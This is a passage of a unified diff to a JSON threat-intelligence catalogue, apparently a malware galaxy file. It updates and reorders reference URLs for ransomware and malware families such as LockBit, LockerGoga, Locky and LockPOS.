+ "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511",
+ "https://lifars.com/wp-content/uploads/2022/02/LockBitRansomware_Whitepaper.pdf",
+ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
+ "https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/",
+ "https://security.packt.com/understanding-lockbit/",
+ "https://analyst1.com/ransomware-diaries-volume-1/",
+ "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit",
- "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
- "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354",
- "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://cybergeeks.tech/a-technical-analysis-of-the-leaked-lockbit-3-0-builder/",
- "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.dr.dk/nyheder/viden/teknologi/frygtede-skulle-lukke-alle-vindmoeller-nu-aabner-vestas-op-om-hacking-angreb",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques",
- "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
+ "https://www.dragos.com/blog/industry-news/dragos-ics-ot-ransomware-analysis-q4-2021/",
"https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/",
- "https://www.connectwise.com/resources/lockbit-profile",
- "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion",
+ "https://securityaffairs.com/141666/cyber-crime/lockbit-green-ransomware-variant.html",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-claims-attack-on-bridgestone-americas/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.dr.dk/nyheder/viden/teknologi/frygtede-skulle-lukke-alle-vindmoeller-nu-aabner-vestas-op-om-hacking-angreb",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
"https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf",
- "https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.youtube.com/watch?v=C733AyPzkoc",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://blog.lexfo.fr/lockbit-malware.html",
- "https://chuongdong.com/reverse%20engineering/2022/03/19/LockbitRansomware/",
- "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://www.glimps.fr/dcouverte-dune-nouvelle-version-du-ramsomware-lockbit/",
+ "https://www.prodaft.com/m/reports/LockBit_Case_Report___TLPWHITE.pdf",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/",
+ "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
+ "https://www.crowdstrike.com/blog/better-together-global-attitude-survey-takeaways-2021/",
"https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/",
+ "https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf",
+ "https://asec.ahnlab.com/ko/39682/",
+ "https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/",
+ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility",
+ "https://www.ic3.gov/Media/News/2022/220204.pdf",
+ "https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.netskope.com/blog/netskope-threat-coverage-lockbit",
+ "https://www.youtube.com/watch?v=C733AyPzkoc",
"https://ke-la.com/lockbit-2-0-interview-with-russian-osint/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockbit-targets-servers",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/",
+ "https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.connectwise.com/resources/lockbit-profile",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants",
+ "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
+ "https://www.logpoint.com/en/blog/hunting-lockbit-variations-using-logpoint/",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.seqrite.com/blog/indian-power-sector-targeted-with-latest-lockbit-3-0-variant/",
+ "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
+ "https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/",
+ "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://www.glimps.fr/lockbit3-0/",
+ "https://www.fortinet.com/blog/threat-research/emerging-lockbit-campaign",
+ "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/",
+ "https://unit42.paloaltonetworks.com/lockbit-2-ransomware/",
+ "https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions",
+ "https://www.seqrite.com/blog/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/",
+ "https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://medium.com/s2wblog/quick-overview-of-leaked-lockbit-3-0-black-builder-program-880ae511d085",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-lockbit",
+ "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
+ "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-1-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254354",
+ "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html",
+ "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://www.lemagit.fr/actualites/252516821/Ransomware-LockBit-30-commence-a-etre-utilise-dans-des-cyberattaques",
"https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/",
"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://amgedwageh.medium.com/lockbit-ransomware-analysis-notes-93a542fc8511",
- "https://www.glimps.fr/lockbit3-0/",
- "https://redcanary.com/blog/intelligence-insights-november-2021/",
- "https://securelist.com/modern-ransomware-groups-ttps/106824/",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://www.cybereason.com/blog/rising-threat-from-lockbit-ransomware",
- "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-gets-aggressive-with-triple-extortion-tactic/",
- "https://blog.minerva-labs.com/lockbit-3.0-aka-lockbit-black-is-here-with-a-new-icon-new-ransom-note-new-wallpaper-but-less-evasiveness",
- "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
- "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility",
- "https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511",
- "https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/",
- "https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/",
- "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
- "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html",
- "https://www.bleepingcomputer.com/news/security/lockbit-victim-estimates-cost-of-ransomware-attack-to-be-42-million/",
- "https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/",
- "https://skyblue.team/posts/hive-recovery-from-lockbit-2.0/",
- "https://www.fortinet.com/blog/threat-research/ransomware-roundup-new-variants",
- "https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html",
- "https://unit42.paloaltonetworks.com/lockbit-2-ransomware/",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
"https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1",
- "https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/",
- "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
- "https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/",
- "https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
- "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/",
- "https://www.crowdstrike.com/blog/how-crowdstrike-prevents-volume-shadow-tampering-by-lockbit-ransomware/",
- "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
+ "https://socradar.io/lockbit-3-another-upgrade-to-worlds-most-active-ransomware/",
+ "https://www.cybereason.com/blog/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool",
+ "https://blog.lexfo.fr/lockbit-malware.html",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://blog.cyble.com/2022/07/05/lockbit-3-0-ransomware-group-launches-new-version/",
+ "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
+ "https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md",
"https://techcommunity.microsoft.com/t5/security-compliance-and-identity/part-2-lockbit-2-0-ransomware-bugs-and-database-recovery/ba-p/3254421",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://asec.ahnlab.com/en/35822/",
- "https://intel471.com/blog/privateloader-malware",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
- "https://news.sophos.com/en-us/2022/04/12/attackers-linger-on-government-agency-computers-before-deploying-lockbit-ransomware/",
- "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://www.mbsd.jp/2021/10/27/assets/images/MBSD_WhitePaper_A-deep-dive-analysis-of-LockBit2.0_Ransomware.pdf"
+ "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion"
],
"synonyms": [
"ABCD Ransomware"
@@ -29787,26 +31472,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga",
- "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202",
- "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://www.youtube.com/watch?v=o6eEN0mUakM",
- "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880",
"https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/",
- "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/",
+ "https://blog.talosintelligence.com/lockergoga/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
+ "https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202",
"https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
"https://www.abuse.io/lockergoga.txt",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
"https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
- "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://www.youtube.com/watch?v=o6eEN0mUakM",
+ "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/",
+ "https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
"https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes"
+ "https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/"
],
"synonyms": [],
"type": []
@@ -29820,18 +31506,18 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile",
"https://news.sophos.com/en-us/2021/08/23/proxyshell-vulnerabilities-in-microsoft-exchange-what-to-do/",
+ "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
+ "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/",
"https://twitter.com/VirITeXplorer/status/1428750497872232459",
"https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows",
- "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
- "https://decoded.avast.io/threatintel/decryptor-for-atomsilo-and-lockfile-ransomware/",
- "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
- "https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html",
"https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
+ "https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/"
],
"synonyms": [],
"type": []
@@ -29844,29 +31530,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.locky",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
- "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html",
- "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/",
- "https://vixra.org/pdf/2002.0183v1.pdf",
"https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/",
- "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
- "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://dissectingmalwa.re/picking-locky.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/",
+ "https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/",
+ "https://vixra.org/pdf/2002.0183v1.pdf",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
+ "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
+ "https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf",
+ "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
"https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/",
- "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/",
"http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html",
- "https://dissectingmalwa.re/picking-locky.html"
+ "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/"
],
"synonyms": [],
"type": []
@@ -29904,21 +31590,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos",
"https://www.cyberbit.com/new-lockpos-malware-injection-technique/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html",
- "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/"
+ "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c740c46b-1d95-42b5-ac3d-2bbab071b859",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872",
"value": "LockPOS"
},
@@ -29927,14 +31604,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.loda",
- "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html",
- "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/",
- "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware",
- "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
"https://blog.talosintelligence.com/2021/02/kasablanka-lodarat.html",
+ "https://blog.talosintelligence.com/2020/02/loda-rat-grows-up.html",
"https://blog.talosintelligence.com/2020/09/lodarat-update-alive-and-well.html",
"https://www.silentpush.com/blog/more-lodarat-infrastructure-targeting-bangladesh-uncovered",
- "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA"
+ "https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel",
+ "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
+ "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware",
+ "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/",
